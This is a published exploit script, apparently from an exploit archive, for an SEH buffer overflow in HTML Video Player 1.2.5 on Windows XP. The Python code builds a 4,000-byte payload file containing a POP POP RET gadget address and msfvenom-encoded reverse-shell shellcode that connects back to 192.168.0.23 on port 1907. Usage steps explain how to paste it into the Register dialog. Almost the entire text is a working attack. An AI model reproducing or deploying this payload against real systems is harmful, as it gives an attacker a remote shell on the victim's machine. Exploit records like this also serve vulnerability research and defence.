HTML Video Player 1.2.5 - Buffer-Overflow (SEH)

Kağan Çapar 2018-11-19 local windows_x86
# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
# Author: Kağan Çapar
# Discovery Date: 2018-11-16
# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
# Vendor Homepage : http://www.html5videoplayer.net
# Tested Version: 1.2.5
# Tested on OS: Windows XP SP3 *ENG
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" and copy content to clipboard 
# Open software, click Help > Register and paste "Username" click "OK"
# Finally, Connect victim machine on port your localport "1907"

#!/usr/bin/python
import struct

#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=41414141
#=> next_handler below!
#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=336F4332 => 

#7C901931   5E               POP ESI
#7C901932   5B               POP EBX
#7C901933   C3               RETN

#Executable modules, item 14
#Base=7C900000
#Size=000B2000 (729088.)
#Entry=7C912AFC ntdll.<ModuleEntryPoint>
#Name=ntdll    (system)
#File version=5.1.2600.6055 (xpsp_sp3_qfe.101
#Path=C:\WINDOWS\system32\ntdll.dll

file = open("exploit.txt", "w")
buf = "\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124
buf+= "\xEB\x06\x90\x90" #6b jmp code
buf+= struct.pack('<I', 0x7C901931)

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes
#Final size of py file: 1684 bytes

buf += "\xbe\xab\xfd\x5f\x95\xda\xcb\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x77\x0e\x03\xdc\xf3\xbd"
buf += "\x60\xde\xe4\xc0\x8b\x1e\xf5\xa4\x02\xfb\xc4\xe4\x71"
buf += "\x88\x77\xd5\xf2\xdc\x7b\x9e\x57\xf4\x08\xd2\x7f\xfb"
buf += "\xb9\x59\xa6\x32\x39\xf1\x9a\x55\xb9\x08\xcf\xb5\x80"
buf += "\xc2\x02\xb4\xc5\x3f\xee\xe4\x9e\x34\x5d\x18\xaa\x01"
buf += "\x5e\x93\xe0\x84\xe6\x40\xb0\xa7\xc7\xd7\xca\xf1\xc7"
buf += "\xd6\x1f\x8a\x41\xc0\x7c\xb7\x18\x7b\xb6\x43\x9b\xad"
buf += "\x86\xac\x30\x90\x26\x5f\x48\xd5\x81\x80\x3f\x2f\xf2"
buf += "\x3d\x38\xf4\x88\x99\xcd\xee\x2b\x69\x75\xca\xca\xbe"
buf += "\xe0\x99\xc1\x0b\x66\xc5\xc5\x8a\xab\x7e\xf1\x07\x4a"
buf += "\x50\x73\x53\x69\x74\xdf\x07\x10\x2d\x85\xe6\x2d\x2d"
buf += "\x66\x56\x88\x26\x8b\x83\xa1\x65\xc4\x60\x88\x95\x14"
buf += "\xef\x9b\xe6\x26\xb0\x37\x60\x0b\x39\x9e\x77\x6c\x10"
buf += "\x66\xe7\x93\x9b\x97\x2e\x50\xcf\xc7\x58\x71\x70\x8c"
buf += "\x98\x7e\xa5\x03\xc8\xd0\x16\xe4\xb8\x90\xc6\x8c\xd2"
buf += "\x1e\x38\xac\xdd\xf4\x51\x47\x24\x9f\x9d\x30\x26\x48"
buf += "\x76\x43\x26\x71\xf5\xca\xc0\x17\xe9\x9a\x5b\x80\x90"
buf += "\x86\x17\x31\x5c\x1d\x52\x71\xd6\x92\xa3\x3c\x1f\xde"
buf += "\xb7\xa9\xef\x95\xe5\x7c\xef\x03\x81\xe3\x62\xc8\x51"
buf += "\x6d\x9f\x47\x06\x3a\x51\x9e\xc2\xd6\xc8\x08\xf0\x2a"
buf += "\x8c\x73\xb0\xf0\x6d\x7d\x39\x74\xc9\x59\x29\x40\xd2"
buf += "\xe5\x1d\x1c\x85\xb3\xcb\xda\x7f\x72\xa5\xb4\x2c\xdc"
buf += "\x21\x40\x1f\xdf\x37\x4d\x4a\xa9\xd7\xfc\x23\xec\xe8"
buf += "\x31\xa4\xf8\x91\x2f\x54\x06\x48\xf4\x74\xe5\x58\x01"
buf += "\x1d\xb0\x09\xa8\x40\x43\xe4\xef\x7c\xc0\x0c\x90\x7a"
buf += "\xd8\x65\x95\xc7\x5e\x96\xe7\x58\x0b\x98\x54\x58\x1e"
buf += "\x90" * (4000 - len(buf))

print len(buf)
file.write(buf)
file.close()